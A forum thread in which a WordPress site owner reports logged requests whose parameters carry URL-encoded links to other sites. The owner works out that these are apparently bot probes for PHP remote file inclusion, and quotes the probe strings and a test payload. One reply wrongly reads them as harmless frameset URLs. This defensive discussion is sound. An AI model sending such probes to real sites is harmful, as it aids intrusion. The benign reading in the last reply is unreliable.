odd page requests: ?p=https://…

  • A WP site of mine has suddenly been getting many odd requests such as:

    ?page_id=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
    ?feed=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&p=23

    Looks like these would be a new form of comment/search spams or links … I don’t know. I’m guessing.

    P.S. If I wanted to hack my WP to add code to check for queries having “https://…”, i.e. the code that handles $_GET[‘p’], anyone know which WP file that is?

    thnks
    Anyone else seen anything like this?

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter mrfrazzlebottom

    (@mrfrazzlebottom)

    UPDATE:

    I just checked the logs for a non-WP site and it too is getting these kinds of queries. So, most likely this is NOT WordPress related.

    Looks like some users/bots are randomly supplying URLs to links that have “arguments” (such as “?p=”).

    I repeat: This is not directly related to WordPress.

    I beg your indulgence.

    Thread Starter mrfrazzlebottom

    (@mrfrazzlebottom)

    YET ANOTHER UPDATE

    I think that these are indicative of a user/bot trying for a PHP exploit. The logged URLs are of already compromised sites, it looks like, with some pages returning this string:

    <?php echo md5("just_a_test");?>

    Some of PHP’s file functions can open/read URLs and not just local files, so, if a PHP based site that simply ‘fopens’ (or some such) a passed argument (i.e. “?p=filetoread” and then somehow eval’ed that file, an exploit such as this just may find an exploit.

    This is what I am thinking anyway. I do not know enough about WP’s internals to know whether or not an exploit such as this would find anything.

    Thanks again for allowing me to post this. Perhaps it will provide some help to someone.

    I have seen code like this in URLs where content from two different sources is used to populate a two window frameset. Seems that http%3a%2f%2f is just another way to write https:// that doesn’t mess up browsers.

    Here’s an example: https://www.vrbo.com/global/siteFrame.asp?mainurl=http%3a%2f%2fwww.cascadecabin.net&returnurl=/50913

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘odd page requests: ?p=https://…’ is closed to new replies.

Tags